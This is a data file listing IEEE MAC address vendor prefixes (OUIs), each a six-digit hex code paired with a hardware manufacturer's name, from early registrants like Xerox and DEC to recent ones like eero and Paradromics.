000434 Accelent Systems, Inc. 00042D Sarian Systems, Ltd. 00042E Netous Technologies, Ltd. 000425 Atmel Corporation 00041B Bridgeworks Ltd. 00044C JENOPTIK 000444 Western Multiplex Corporation 000439 Rosco Entertainment Technology, Inc. 00043A Intelligent Telecommunications, Inc. 00043F ESTeem Wireless Modems, Inc 000492 Hive Internet, Ltd. 00048C Nayna Networks, Inc. 000491 Technovision, Inc. 000493 Tsinghua Unisplendour Co., Ltd. 000494 Breezecom, Ltd. 0003DB Apogee Electronics Corp. 0003D2 Crossbeam Systems, Inc. 0003D0 KOANKEISO Co., Ltd. 000489 YAFO Networks, Inc. 00048A Temia Vertriebs GmbH 000481 Econolite Control Products, Inc. 000477 Scalant Systems, Inc. 000473 Photonex Corporation 0003F2 Seneca Networks 0003F0 Redfern Broadband Networks 0003EB Atrica 0003E7 Logostek Co. Ltd. 0003E3 Cisco Systems, Inc 000404 Makino Milling Machine Co., Ltd. 000405 ACN Technologies 000401 Osaki Electric Co., Ltd. 0003F4 NetBurner 000416 Parks S/A Comunicacoes Digitais 00040F Asus Network Technologies, Inc. 00040A Sage Systems 000324 SANYO Techno Solutions Tottori Co., Ltd. 000325 Arima Computer Corp. 00031F Condev Ltd. 00029F L-3 Communication Aviation Recorders 00031B Cellvision Systems, Inc. 00031C Svenska Hardvarufabriken AB 0001A8 Welltech Computer Co., Ltd. 000317 Merlin Systems, Inc. 000318 Cyras Systems, Inc. 0003AE Allied Advanced Manufacturing Pte, Ltd. 0003A3 MAVIX, Ltd. 0003A1 HIPER Information & Communication, Inc. 000396 EZ Cast Co., Ltd. 00039A SiConnect 000394 Connect One 000363 Miraesys Co., Ltd. 00035F Prüftechnik Condition Monitoring GmbH & Co. KG 000360 PAC Interactive Technology, Inc. 000361 Widcomm, Inc. 000359 DigitalSis 000352 Colubris Networks 00038A America Online, Inc. 00038D PCS Revenue Control Systems, Inc. 000388 Fastfame Technology Co., Ltd. 00037E PORTech Communications, Inc. 000374 Control Microsystems 000376 Graphtec Technology, Inc. 000378 HUMAX Co., Ltd. 00036D Runtop, Inc. 00036E Nicon Systems (Pty) Limited 000371 Acomz Networks Corp. 0003B6 QSI Corporation 0003B1 ICU Medical, Inc. 0003B3 IA Link Systems Co., Ltd. 0003AD Emerson Energy Systems AB 0003A7 Unixtar Technology, Inc. 00034C Shanghai DigiVision Technology Co., Ltd. 000349 Vidicode Datacommunicatie B.V. 00033E Tateyama System Laboratory Co., Ltd. 0003CF Muxcom, Inc. 0003D1 Takaya Corporation 00033C Daiden Co., Ltd. 00032A UniData Communication Systems, Inc. 000274 Tommy Technologies Corp. 000272 CC&C Technologies, Inc. 00026D Adept Telecom 00026B BCM Computers Co., Ltd. 000266 Thermalogic Corporation 000268 Harris Government Communications 00025E High Technology Ltd 000283 Spectrum Controls, Inc. 000284 UK Grid Solutions Limited 000280 Mu Net, Inc. 009064 Thomson Inc. 00027A IOI Technology Corporation 00029E Information Equipment Co., Ltd. 00029B Kreatel Communications AB 000295 IP.Access Limited 000293 Solid Data Systems 000289 DNE Technologies 00030C Telesoft Technologies Ltd. 000308 AM Communications, Inc. 000307 Secure Works, Inc. 000306 Fusion In Tech Co., Ltd. 0002FC Cisco Systems, Inc 0002FA DX Antenna Co., Ltd. 0002FB Baumuller Aulugen-Systemtechnik GmbH 0002F6 Equipe Communications 0002E3 LITE-ON Communications, Inc. 0002CA EndPoints, Inc. 0002C4 OPT Machine Vision Tech Co., Ltd 0002BF dotRocket, Inc. 0002DD Bromax Communications, Ltd. 000223 ClickTV 0002CB TriState Ltd. 000260 Accordion Networks, Inc. 0002A7 Vivace Networks 0001CA Geocast Network Systems, Inc. 0001D1 CoNet Communications, Inc. 0001B2 Digital Processing Systems, Inc. 0001B8 Netsensity, Inc. 0001B9 SKF (U.K.) Limited 0001B3 Precision Electronic Manufacturing 0001BD Peterson Electro-Musical Products, Inc. 00012F Twinhead International Corp 000247 Great Dragon Information Technology (Group) Co., Ltd. 000243 Raysis Co., Ltd. 000231 Ingersoll-Rand 00020A Gefran Spa 000209 Shenzhen SED Information Technology Co., Ltd. 000206 Telital R&D Denmark A/S 000202 Amino Communications, Ltd. 000201 IFM Electronic gmbh 000224 C-COR 00021F Aculab PLC 00021A Zuma Networks 000222 Chromisys, Inc. 000213 S.D.E.L. 00017E ADTEK System Science Co., Ltd. 000183 ANITE TELECOMS 0001A4 Microlink Corporation 000234 Imperial Technology, Inc. 000236 INIT GmbH 00022B SAXA, Inc. 0001B7 Centos, Inc. 0001B5 Turin Networks, Inc. 0001DB Freecom Technologies GmbH 0001DF ISDN Communications, Ltd. 0001EF Camtel Technology Corp. 000195 Sena Technologies, Inc. 000184 SIEB & MEYER AG 00018E Logitec Corporation 000179 WIRELESS TECHNOLOGY, INC. 000160 ELMEX Co., LTD. 00014E WIN Enterprises, Inc. 003073 International Microsystems, In 000153 ARCHTEK TELECOM CORPORATION 000135 KDC Corp. 000141 CABLE PRINT 000131 Bosch Security Systems, Inc. 000146 Tesco Controls, Inc. 000149 TDT AG 00B0F5 NetWorth Technologies, Inc. 00B0DB Nextcell, Inc. 00B0AE Symmetricom 00B0E7 British Federal Ltd. 00B08E Cisco Systems, Inc 00010C System Talks Inc. 000111 iDigm Inc. 000114 KANDA TSUSHIN KOGYO CO., LTD. 000107 Leiser GmbH 00010B Space CyberLink, Inc. 00303F TurboComm Tech Inc. 00016D CarrierComm Inc. 00016A ALITEC 00016F Inkel Corp. 000170 ESE Embedded System Engineer'g 000165 AirSwitch Corporation 000156 FIREWIREDIRECT.COM, INC. 0030BE City-Net Technology, Inc. 003092 Kontron Electronics AG 00305C SMAR Laboratories Corp. 000118 EZ Digital Co., Ltd. 000128 EnjoyWeb, Inc. 00011C Universal Talkware Corporation 00B0DF Starboard Storage Systems 003070 1Net Corporation 0030F8 Dynapro Systems, Inc. 0030B3 San Valley Systems, Inc. 003009 Tachion Networks, Inc. 00307A Advanced Technology & Systems 003061 MobyTEL 003056 HMS Industrial Networks 003050 Versa Technology 0030C0 Lara Technology, Inc. 00304B ORBACOM SYSTEMS, INC. 0030FA TELICA, INC. 0030A5 ACTIVE POWER 003084 ALLIED TELESYN INTERNAIONAL 0030E9 GMA COMMUNICATION MANUFACT'G 003029 OPICOM 003083 Ivron Systems 0030B6 Cisco Systems, Inc 0030C7 Macromate Corp. 0030E4 CHIYODA SYSTEM RIKEN 003066 RFM 003031 LIGHTWAVE COMMUNICATIONS, INC. 003060 Powerfile, Inc. 0030A0 TYCO SUBMARINE SYSTEMS, LTD. 003015 CP CLARE CORP. 00308F MICRILOR, Inc. 00309C Timing Applications, Inc. 00307E Redflex Communication Systems 00304F PLANET Technology Corporation 003022 Fong Kai Industrial Co., Ltd. 0030E7 CNF MOBILE SOLUTIONS, INC. 003043 IDREAM TECHNOLOGIES, PTE. LTD. 0030B4 INTERSIL CORP. 003000 ALLWELL TECHNOLOGY CORP. 003011 HMS Industrial Networks 0030B1 TrunkNet 0030E0 OXFORD SEMICONDUCTOR LTD. 003064 ADLINK TECHNOLOGY, INC. 0030DB Mindready Solutions, Inc. 003004 LEADTEK RESEARCH INC. 0030F9 Sollae Systems Co., Ltd. 003002 Expand Networks 003078 Cisco Systems, Inc 003005 Fujitsu Siemens Computers 00D05B ACROLOOP MOTION CONTROL 00D042 MAHLO GMBH & CO. UG 00D031 INDUSTRIAL LOGIC CORPORATION 00D038 FIVEMERE, LTD. 00D0C6 THOMAS & BETTS CORP. 0001A7 UNEX TECHNOLOGY CORPORATION 00D0F7 NEXT NETS CORPORATION 00D003 COMDA ENTERPRISES CORP. 00D0D2 EPILOG CORPORATION 003068 CYBERNETICS TECH. CO., LTD. 003091 TAIWAN FIRST LINE ELEC. CORP. 0030CD CONEXANT SYSTEMS, INC. 00305B Toko Inc. 00D077 LUCENT TECHNOLOGIES 00D03E ROCKETCHIPS, INC. 00D093 TQ - COMPONENTS GMBH 00D03F AMERICAN COMMUNICATION 00D028 Harmonic, Inc 00D025 XROSSTECH, INC. 00D044 ALIDIAN NETWORKS, INC. 00D018 QWES. COM, INC. 00D0A6 LANBIRD TECHNOLOGY CO., LTD. 00D049 IMPRESSTEK CO., LTD. 00D007 MIC ASSOCIATES, INC. 00D0FF Cisco Systems, Inc 00D0CE iSystem Labs 00D0F9 ACUTE COMMUNICATIONS CORP. 00D06F KMC CONTROLS 00503C TSINGHUA NOVEL ELECTRONICS 005060 TANDBERG TELECOM AS 0050EE TEK DIGITEL CORPORATION 0050FF HAKKO ELECTRONICS CO., LTD. 0050D2 CMC Electronics Inc 0050F9 Sensormatic Electronics LLC 005048 INFOLIBRIA 00504E SIERRA MONITOR CORP. 00D072 BROADLOGIC 00D0E2 MRT MICRO, INC. 00D027 APPLIED AUTOMATION, INC. 00D087 MICROFIRST INC. 00D091 SMARTSAN SYSTEMS, INC. 00D080 EXABYTE CORPORATION 00D04E LOGIBAG 00D02C CAMPBELL SCIENTIFIC, INC. 00D0FD OPTIMA TELE.COM, INC. 00D0CC TECHNOLOGIES LYRE INC. 005077 PROLIFIC TECHNOLOGY, INC. 005033 MAYAN NETWORKS 005045 RIOWORKS SOLUTIONS, INC. 00502B GENRAD LTD. 00502E CAMBEX CORPORATION 00506E CORDER ENGINEERING CORPORATION 00502C SOYO COMPUTER, INC. 0050E6 HAKUSAN CORPORATION 00D0CD ATAN TECHNOLOGY INC. 00D040 SYSMATE CO., LTD. 00D08C GENOA TECHNOLOGY, INC. 00D059 AMBIT MICROSYSTEMS CORP. 00D0A9 SHINANO KENSHI CO., LTD. 00D0DD SUNRISE TELECOM, INC. 00D0E6 IBOND INC. 00D0D1 Sycamore Networks 00D01A URMET TLC S.P.A. 00D06A LINKUP SYSTEMS CORPORATION 00D089 DYNACOLOR, INC. 0050F8 ENTREGA TECHNOLOGIES, INC. 005042 SCI MANUFACTURING SINGAPORE PTE, LTD. 0050C0 GATAN, INC. 005051 IWATSU ELECTRIC CO., LTD. 0050BB CMS TECHNOLOGIES 005062 KOUWELL ELECTRONICS CORP. ** 0050D5 AD SYSTEMS CORP. 0050F3 GLOBAL NET INFORMATION CO., Ltd. 0050BE FAST MULTIMEDIA AG 00506F G-CONNECT 005068 ELECTRONIC INDUSTRIES ASSOCIATION 00501C JATOM SYSTEMS, INC. 005092 Rigaku Corporation Osaka Plant 00507A XPEED, INC. 00504F OLENCOM ELECTRONICS 0050D7 TELSTRAT 0050F6 PAN-INTERNATIONAL INDUSTRIAL CORP. 00506C Beijer Electronics Products AB 005044 ASACA CORPORATION 00500E CHROMATIS NETWORKS, INC. 0050EB ALPHA-TOP CORPORATION 0050EF SPE Systemhaus GmbH 005098 GLOBALOOP, LTD. 0050BC HAMMER STORAGE SOLUTIONS 009071 Applied Innovation Inc. 00507D IFP 005097 MMC-EMBEDDED COMPUTERTECHNIK GmbH 005010 NovaNET Learning, Inc. 00509A TAG ELECTRONIC SYSTEMS 00905D NETCOM SICHERHEITSTECHNIK GMBH 0090D1 LEICHU ENTERPRISE CO., LTD. 009046 DEXDYNE, LTD. 0090DA DYNARC, INC. 005007 SIEMENS TELECOMMUNICATION SYSTEMS LIMITED 005022 ZONET TECHNOLOGY, INC. 005040 Panasonic Electric Works Co., Ltd. 0090FB PORTWELL, INC. 009094 OSPREY TECHNOLOGIES, INC. 0090B3 AGRANAT SYSTEMS 0050EC OLICOM A/S 0050C9 MASPRO DENKOH CORP. 005069 PixStream Incorporated 0090C7 ICOM INC. 009035 ALPHA TELECOM, INC. 00907A Spectralink, Inc 0090F0 Harmonic Video Systems Ltd. 009020 PHILIPS ANALYTICAL X-RAY B.V. 0010A3 OMNITRONIX, INC. 0010AD SOFTRONICS USB, INC. 00904F ABB POWER T&D COMPANY, INC. 009060 SYSTEM CREATE CORP. 009013 SAMSAN CORP. 009085 GOLDEN ENTERPRISES, INC. 0090DC TECO INFORMATION SYSTEMS 0090E2 DISTRIBUTED PROCESSING TECHNOLOGY 0010A7 UNEX TECHNOLOGY CORPORATION 0010D5 IMASDE CANARIAS, S.A. 001055 FUJITSU MICROELECTRONICS, INC. 001052 METTLER-TOLEDO (ALBSTADT) GMBH 00106B SONUS NETWORKS, INC. 0010C3 CSI-CONTROL SYSTEMS 00900F KAWASAKI HEAVY INDUSTRIES, LTD 0090EA ALPHA TECHNOLOGIES, INC. 009077 ADVANCED FIBRE COMMUNICATIONS 009099 ALLIED TELESIS, K.K. 009055 PARKER HANNIFIN CORPORATION COMPUMOTOR DIVISION 0090E0 SYSTRAN CORP. 009022 IVEX 009016 ZAC 0090FF TELLUS TECHNOLOGY INC. 00903E N.V. PHILIPS INDUSTRIAL ACTIVITIES 0090BA VALID NETWORKS, INC. 009018 ITO ELECTRIC INDUSTRY CO, LTD. 0090CD ENT-EMPRESA NACIONAL DE TELECOMMUNICACOES, S.A. 0090D0 Thomson Telecom Belgium 00909B MARKEM-IMAJE 00903C ATLANTIC NETWORK SYSTEMS 0090A7 CLIENTEC CORPORATION 00905C EDMI 0090E3 AVEX ELECTRONICS INC. 009053 DAEWOO ELECTRONICS CO., LTD. 0090A9 WESTERN DIGITAL 0090F3 ASPECT COMMUNICATIONS 001051 CMICRO CORPORATION 001037 CYQ've Technology Co., Ltd. 00101B CORNET TECHNOLOGY, INC. 0010DC MICRO-STAR INTERNATIONAL CO., LTD. 00100A WILLIAMS COMMUNICATIONS GROUP 001032 ALTA TECHNOLOGY 001080 METAWAVE COMMUNICATIONS 00101E MATSUSHITA ELECTRONIC INSTRUMENTS CORP. 00104D SURTEC INDUSTRIES, INC. 001033 ACCESSLAN COMMUNICATIONS, INC. 0010F4 Vertical Communications 001077 SAF DRIVE SYSTEMS, LTD. 0010B3 NOKIA MULTIMEDIA TERMINALS 001091 NO WIRES NEEDED BV 0010DD ENABLE SEMICONDUCTOR, INC. 001078 NUERA COMMUNICATIONS, INC. 00107A AmbiCom, Inc. 00102D HITACHI SOFTWARE ENGINEERING 001012 PROCESSOR SYSTEMS (I) PVT LTD 001015 OOmon Inc. 0010B9 MAXTOR CORP. 00105D Draeger Medical 00E07F LOGISTISTEM s.r.l. 00E013 EASTERN ELECTRONIC CO., LTD. 00E0BD INTERFACE SYSTEMS, INC. 00E0FD A-TREND TECHNOLOGY CO., LTD. 00E06D COMPUWARE CORPORATION 00E06E FAR SYSTEMS S.p.A. 00E0BB NBX CORPORATION 00E08A GEC AVERY, LTD. 00E086 Emerson Network Power, Avocent Division 00E01B SPHERE COMMUNICATIONS, INC. 00E038 PROXIMA CORPORATION 00E09C MII 00E0E9 DATA LABS, INC. 00E00C MOTOROLA 00E00A DIBA, INC. 00E0C5 BCOM ELECTRONICS INC. 00E0EE MAREL HF 00E08E UTSTARCOM 00E03F JATON CORPORATION 00E0D4 EXCELLENT COMPUTER 00E0A4 ESAOTE S.p.A. 00E069 JAYCOR 00E0DE DATAX NV 00E0E8 GRETACODER Data Systems AG 00E016 RAPID CITY COMMUNICATIONS 00E0EA INNOVAT COMMUNICATIONS, INC. 00E064 SAMSUNG ELECTRONICS 00E005 TECHNICAL CORP. 00E0C1 MEMOREX TELEX JAPAN, LTD. 00E084 COMPULITE R&D 00E0A5 ComCore Semiconductor, Inc. 00E015 HEIWA CORPORATION 00E0C9 AutomatedLogic Corporation 00E0A9 FUNAI ELECTRIC CO., LTD. 0060A5 PERFORMANCE TELECOM CORP. 0060A1 VPNet, Inc. 006027 Superior Modular Products 0060BC KeunYoung Electronics & Communication Co., Ltd. 00602E CYCLADES CORPORATION 006074 QSC LLC 006076 SCHLUMBERGER TECHNOLOGIES RETAIL PETROLEUM SYSTEMS 00E0C4 HORNER ELECTRIC, INC. 00E096 SHIMADZU CORPORATION 00E017 EXXACT GmbH 00607F AURORA TECHNOLOGIES, INC. 00E029 STANDARD MICROSYSTEMS CORP. 0060EA StreamLogic 006029 CARY PERIPHERALS INC. 0060A8 TIDOMAT AB 0060FC CONSERVATION THROUGH INNOVATION LTD. 006018 STELLAR ONE CORPORATION 0060F9 DIAMOND LANE COMMUNICATIONS 0060B6 LAND COMPUTER CO., LTD. 00606C ARESCOM 00601B MESA ELECTRONICS 0060E3 ARBIN INSTRUMENTS 006071 MIDAS LAB, INC. 0060D4 ELDAT COMMUNICATION LTD. 006061 WHISTLE COMMUNICATIONS CORP. 006005 FEEDBACK DATA LTD. 0060D9 TRANSYS NETWORKS INC. 00601F STALLION TECHNOLOGIES 00A05A KOFAX IMAGE PRODUCTS 00A052 STANILITE ELECTRONICS PTY. LTD 00A05E MYRIAD LOGIC INC. 00A095 ACACIA NETWORKS, INC. 00A0F2 INFOTEK COMMUNICATIONS, INC. 00A0DF STS TECHNOLOGIES, INC. 00A094 COMSAT CORPORATION 00600A SORD COMPUTER CORPORATION 0060A4 GEW Technologies (PTY)Ltd 006064 NETCOMM LIMITED 0060C5 ANCOT CORP. 0060A9 GESYTEC MBH 0060F2 LASERGRAPHICS, INC. 0060C3 NETVISION CORPORATION 00A099 K-NET LTD. 00A0EC TRANSMITTON LTD. 00A028 CONNER PERIPHERALS 00A09E ICTV 006081 TV/COM INTERNATIONAL 00A005 DANIEL INSTRUMENTS, LTD. 00A053 COMPACT DEVICES, INC. 00A069 Symmetricom, Inc. 00A07A ADVANCED PERIPHERALS TECHNOLOGIES, INC. 00A04E VOELKER TECHNOLOGIES, INC. 00A067 NETWORK SERVICES GROUP 00A0E0 TENNYSON TECHNOLOGIES PTY LTD 00609B AstroNova, Inc 0060DB NTP ELEKTRONIK A/S 006052 PERIPHERALS ENTERPRISE CO., Ltd. 0060B2 PROCESS CONTROL CORP. 00A020 CITICORP/TTI 006082 NOVALINK TECHNOLOGIES, INC. 0060E7 RANDATA 006054 CONTROLWARE GMBH 0060C2 MPL AG 00A0EF LUCIDATA LTD. 00A0CE Ecessa 00A0AB NETCS INFORMATIONSTECHNIK GMBH 00A0D8 SPECTRA - TEK 00A080 Tattile SRL 00A02B TRANSITIONS RESEARCH CORP. 00A0E8 REUTERS HOLDINGS PLC 00A008 NETCORP 00A0FA Marconi Communication GmbH 00A0CB ARK TELECOMMUNICATIONS, INC. 00A0BB HILAN GMBH 00A091 APPLICOM INTERNATIONAL 00A0A5 TEKNOR MICROSYSTEME, INC. 00A017 J B M CORPORATION 00A0FD SCITEX DIGITAL PRINTING, INC. 00A00F Broadband Technologies 00A002 LEEDS & NORTHRUP AUSTRALIA PTY LTD 00A0E4 OPTIQUEST 00A0EE NASHOBA NETWORKS 00A066 ISA CO., LTD. 0020E3 MCD KENCOM CORPORATION 002013 DIVERSIFIED TECHNOLOGY, INC. 0020AB MICRO INDUSTRIES CORP. 00208D CMD TECHNOLOGY 0020DD Cybertec Pty Ltd 0020E6 LIDKOPING MACHINE TOOLS AB 00A025 REDCOM LABS INC. 00A0A2 B810 S.R.L. 00A050 CYPRESS SEMICONDUCTOR 00A0DD AZONIX CORPORATION 00A001 DRS Signal Solutions 00A075 MICRON TECHNOLOGY, INC. 00A009 WHITETREE NETWORK 00A00C KINGMAX TECHNOLOGY, INC. 00A0C3 UNICOMPUTER GMBH 00A00A Airspan 00A0E7 CENTRAL DATA CORPORATION 00A034 AXEL 00A054 Private 0020B7 NAMAQUA COMPUTERWARE 002073 FUSION SYSTEMS CORPORATION 002035 IBM Corp 00207A WiSE Communications, Inc. 00203E LogiCan Technologies, Inc. 002058 ALLIED SIGNAL INC. 00205A COMPUTER IDENTICS 002000 LEXMARK INTERNATIONAL, INC. 002086 MICROTECH ELECTRONICS LIMITED 002023 T.C. TECHNOLOGIES PTY. LTD 0020B2 GKD Gesellschaft Fur Kommunikation Und Datentechnik 002052 RAGULA SYSTEMS 0020FE TOPWARE INC. / GRAND COMPUTER 00201D KATANA PRODUCTS 002046 CIPRICO, INC. 002026 AMKLY SYSTEMS, INC. 002065 SUPERNET NETWORKING INC. 002019 OHLER GMBH 00202A N.V. DZINE 002083 PRESTICOM INCORPORATED 00208E CHEVIN SOFTWARE ENG. LTD. 00209B ERSAT ELECTRONIC GMBH 00201C EXCEL, INC. 00209E BROWN'S OPERATING SYSTEM SERVICES, LTD. 002097 APPLIED SIGNAL TECHNOLOGY 00207F KYOEI SANGYO CO., LTD. 0020C9 VICTRON BV 002077 KARDIOS SYSTEMS CORP. 0020D3 OST (OUEST STANDARD TELEMATIQU 0020F6 NET TEK AND KARLNET, INC. 0020C6 NECTEC 0020B0 GATEWAY DEVICES, INC. 00205B Kentrox, LLC 00C0AA SILICON VALLEY COMPUTER 00C066 DOCUPOINT, INC. 00C02D FUJI PHOTO FILM CO., LTD. 00C0F2 TRANSITION NETWORKS 00C0BD INEX TECHNOLOGIES, INC. 00C088 EKF ELEKTRONIK GMBH 00C031 DESIGN RESEARCH SYSTEMS, INC. 000701 RACAL-DATACOM 00C09C HIOKI E.E. CORPORATION 00C097 ARCHIPEL SA 00C004 JAPAN BUSINESS COMPUTER CO.LTD 002008 CABLE & COMPUTER TECHNOLOGY 00C00B NORCONTROL A.S. 00C060 ID SCANDINAVIA AS 00C0C9 ELSAG BAILEY PROCESS 00C048 BAY TECHNICAL ASSOCIATES 00C00E PSITECH, INC. 00C0FD PROSUM 00C076 I-DATA INTERNATIONAL A-S 00C046 Blue Chip Technology Ltd 00C014 TELEMATICS CALABASAS INT'L,INC 00AA3C OLIVETTI TELECOM SPA (OLTECO) 00C011 INTERACTIVE COMPUTING DEVICES 00C03E FA. GEBR. HELLER GMBH 00C09E CACHE COMPUTERS, INC. 00C0AC GAMBIT COMPUTER COMMUNICATIONS 00C034 TRANSACTION NETWORK 00C093 ALTA RESEARCH CORP. 00C02C CENTRUM COMMUNICATIONS, INC. 00C02B GERLOFF GESELLSCHAFT FUR 00C054 NETWORK PERIPHERALS, LTD. 00C022 LASERMASTER TECHNOLOGIES, INC. 00C025 DATAPRODUCTS CORPORATION 00C0DF KYE Systems Corp. 00C0F5 METACOMP, INC. 00C091 JABIL CIRCUIT, INC. 00C049 U.S. ROBOTICS, INC. 00C09D DISTRIBUTED SYSTEMS INT'L, INC 004077 MAXTON TECHNOLOGY CORPORATION 0040E7 ARNOS INSTRUMENTS & COMPUTER 004087 UBITREX CORPORATION 004007 TELMAT INFORMATIQUE 00407B SCIENTIFIC ATLANTA 00402C ISIS DISTRIBUTED SYSTEMS, INC. 0040CC SILCOM MANUF'G TECHNOLOGY INC. 00C0E9 OAK SOLUTIONS, LTD. 00C0C5 SID INFORMATICA 00C051 ADVANCED INTEGRATION RESEARCH 00C085 ELECTRONICS FOR IMAGING, INC. 00C0B2 NORAND CORPORATION 004073 BASS ASSOCIATES 00407D EXTENSION TECHNOLOGY CORP. 00404D TELECOMMUNICATIONS TECHNIQUES 00400D LANNET DATA COMMUNICATIONS,LTD 004019 AEON SYSTEMS, INC. 0040BE BOEING DEFENSE & SPACE 00406E COROLLARY, INC. 00C0FB ADVANCED TECHNOLOGY LABS 0040CF STRAWBERRY TREE, INC. 004076 Sun Conversion Technologies 00405B FUNASSET LIMITED 00405D STAR-TEK, INC. 004008 A PLUS INFO CORPORATION 0040B5 VIDEO TECHNOLOGY COMPUTERS LTD 004012 WINDATA, INC. 0040D5 Sartorius Mechatronics T&H GmbH 0040BF CHANNEL SYSTEMS INTERN'L INC. 00C0A0 ADVANCE MICRO RESEARCH, INC. 00C010 HIRAKAWA HEWTECH CORP. 00C037 DYNATEM 004083 TDA INDUSTRIA DE PRODUTOS 004010 SONIC SYSTEMS, INC. 0040CA FIRST INTERNAT'L COMPUTER, INC 00401E ICC 00409A NETWORK EXPRESS, INC. 004094 SHOGRAPHICS, INC. 004055 METRONIX GMBH 004027 SMC MASSACHUSETTS, INC. 004045 TWINHEAD CORPORATION 0040E2 MESA RIDGE TECHNOLOGIES, INC. 00408C AXIS COMMUNICATIONS AB 0040C4 KINKEI SYSTEM CORPORATION 00408B RAYLAN CORPORATION 0040EF HYPERCOM, INC. 004093 PAXDATA NETWORKS LTD. 004085 SAAB INSTRUMENTS AB 004023 LOGIC CORPORATION 0040A4 ROSE ELECTRONICS 004022 KLEVER COMPUTERS, INC. 004074 CABLE AND WIRELESS 0040B8 IDEA ASSOCIATES 0040E8 CHARLES RIVER DATA SYSTEMS,INC 0040C0 VISTA CONTROLS CORPORATION 0080D7 Fantum Engineering 00807A AITECH SYSTEMS LTD. 0080DC PICKER INTERNATIONAL 00802B INTEGRATED MARKETING CO 008001 PERIPHONICS CORPORATION 008097 CENTRALP AUTOMATISMES 008041 VEB KOMBINAT ROBOTRON 008080 DATAMEDIA CORPORATION 004028 NETCOMM LIMITED 0040CB LANWAN TECHNOLOGIES 0040B2 SYSTEMFORSCHUNG 0040E6 C.A.E.N. 008088 VICTOR COMPANY OF JAPAN, LTD. 0080D8 NETWORK PERIPHERALS INC. 004015 ASCOM INFRASYS AG 008056 SPHINX Electronics GmbH & Co KG 0040F0 MicroBrain,Inc. 004089 MEIDENSHA CORPORATION 008098 TDK CORPORATION 00803F TATUNG COMPANY 0080E6 PEER NETWORKS, INC. 0080E0 XTP SYSTEMS, INC. 008095 BASIC MERTON HANDELSGES.M.B.H. 0080AE HUGHES NETWORK SYSTEMS 0080DB GRAPHON CORPORATION 008031 BASYS, CORP. 00803A VARITYPER, INC. 00801C NEWPORT SYSTEMS SOLUTIONS 00809E DATUS GMBH 008071 SAI TECHNOLOGY 008082 PEP MODULAR COMPUTERS GMBH 008039 ALCATEL STC AUSTRALIA 008023 INTEGRATED BUSINESS NETWORKS 00806B SCHMID TELECOMMUNICATION 008059 STANLEY ELECTRIC CO., LTD 0080CA NETCOM RESEARCH INCORPORATED 0080D5 CADRE TECHNOLOGIES 00801B KODIAK TECHNOLOGY 0080D3 SHIVA CORP. 0080B3 AVAL DATA CORPORATION 0080A1 MICROTEST, INC. 0080A9 CLEARPOINT RESEARCH 008008 DYNATECH COMPUTER SYSTEMS 0000E4 IN2 GROUPE INTERTECHNIQUE 000094 ASANTE TECHNOLOGIES 000090 MICROCOM 000047 NICOLET INSTRUMENTS CORP. 0080BF TAKAOKA ELECTRIC MFG. CO. LTD. 008017 PFU LIMITED 0080F8 MIZAR, INC. 008013 THOMAS-CONRAD CORPORATION 00806E NIPPON STEEL CORPORATION 008010 COMMODORE INTERNATIONAL 008047 IN-NET CORP. 008067 SQUARE D COMPANY 008045 MATSUSHITA ELECTRIC IND. CO 008020 NETWORK PRODUCTS 008070 COMPUTADORAS MICRON 000070 HCL LIMITED 00008F Raytheon 000051 HOB ELECTRONIC GMBH & CO. KG 0000A7 NETWORK COMPUTING DEVICES INC. 0080F9 HEURIKON CORPORATION 000020 DATAINDUSTRIER DIAB AB 00007A DANA COMPUTER INC. 000045 FORD AEROSPACE & COMM. CORP. 00009C ROLM MIL-SPEC COMPUTERS 00007C AMPERE INCORPORATED 000068 ROSEMOUNT CONTROLS 0000E9 ISICAD, INC. 00009F AMERISTAR TECHNOLOGIES INC. 0000E3 INTEGRATED MICRO PRODUCTS LTD 0000A1 MARQUETTE ELECTRIC CO. 0000F5 DIAMOND SALES LIMITED 00005C TELEMATICS INTERNATIONAL INC. 0000AC CONWARE COMPUTER CONSULTING 000030 VG LABORATORY SYSTEMS LTD 000035 SPECTRAGRAPHICS CORPORATION 000021 SUREMAN COMP. & COMMUN. CORP. 000074 RICOH COMPANY LTD. 0000F1 MAGNA COMPUTER CORPORATION 000054 Schneider Electric 000026 SHA-KEN CO., LTD. 0000B6 MICRO-MATIC RESEARCH 000082 LECTRA SYSTEMES SA 00002B CRISP AUTOMATION, INC 000014 NETRONIX 000072 MINIWARE TECHNOLOGY 00008D Cryptek Inc. 00003B i Controls, Inc. 00008B INFOTRON 000046 OLIVETTI NORTH AMERICA 000098 CROSSCOMM CORPORATION 0000C6 EON SYSTEMS 0000AD BRUKER INSTRUMENTS INC. 0000D3 WANG LABORATORIES INC. 0000D0 DEVELCON ELECTRONICS LTD. 000093 PROTEON INC. 08005D GOULD INC. 08005B VTA TECHNOLOGIES INC. 080057 Evans & Sutherland 080071 MATRA (DSIE) 08006C SUNTEK TECHNOLOGY INT'L 080067 ComDesign 0000B3 CIMLINC INCORPORATED 08008C NETWORK RESEARCH CORPORATION 080026 NORSK DATA A.S. 080025 CONTROL DATA 080011 TEKTRONIX INC. 080081 ASTECH INC. 08002D LAN-TEC INC. 3C0D2C Liquid-Markets GmbH EC6794 Aruba, a Hewlett Packard Enterprise Company F4BFBB China Mobile Group Device Co.,Ltd. 00DD00 UNGERMANN-BASS INC. 0000AA XEROX CORPORATION 100000 Private 0000D7 DARTMOUTH COLLEGE 040AE0 XMIT AG COMPUTER NETWORKS AA0004 DIGITAL EQUIPMENT CORPORATION 08000C MIKLYN DEVELOPMENT CO. 00DD05 UNGERMANN-BASS INC. 080003 ADVANCED COMPUTER COMM. 9070D3 Fiberhome Telecommunication Technologies Co.,LTD 6C48A6 Fiberhome Telecommunication Technologies Co.,LTD 080017 NATIONAL SEMICONDUCTOR 08001D ABLE COMMUNICATIONS INC. 00DD0B UNGERMANN-BASS INC. 00DD0F UNGERMANN-BASS INC. 000001 XEROX CORPORATION 00DD03 UNGERMANN-BASS INC. 789F38 Shenzhen Feasycom Co., Ltd 544C8A Microsoft Corporation 84AC60 Guangxi Hesheng Electronics Co., Ltd. 9CA389 Nokia 5C101E zte corporation C46026 SKY UK LIMITED 905A08 Super Micro Computer, Inc. FCF763 KunGao Micro (JiangSu) Co., LTd D081C5 Juniper Networks FCB9DF Motorola Mobility LLC, a Lenovo Company 808C97 Kaon Group Co., Ltd. 5449FC Ubee Interactive Co., Limited 201746 Paradromics, Inc. 18F935 Cisco Systems, Inc 588B1C Cisco Systems, Inc BC3198 IEEE Registration Authority ECA2A0 Taicang T&W Electronics 0C7043 Sony Interactive Entertainment Inc. DC233B Extreme Networks, Inc. 7093C1 eero inc. 0011A9 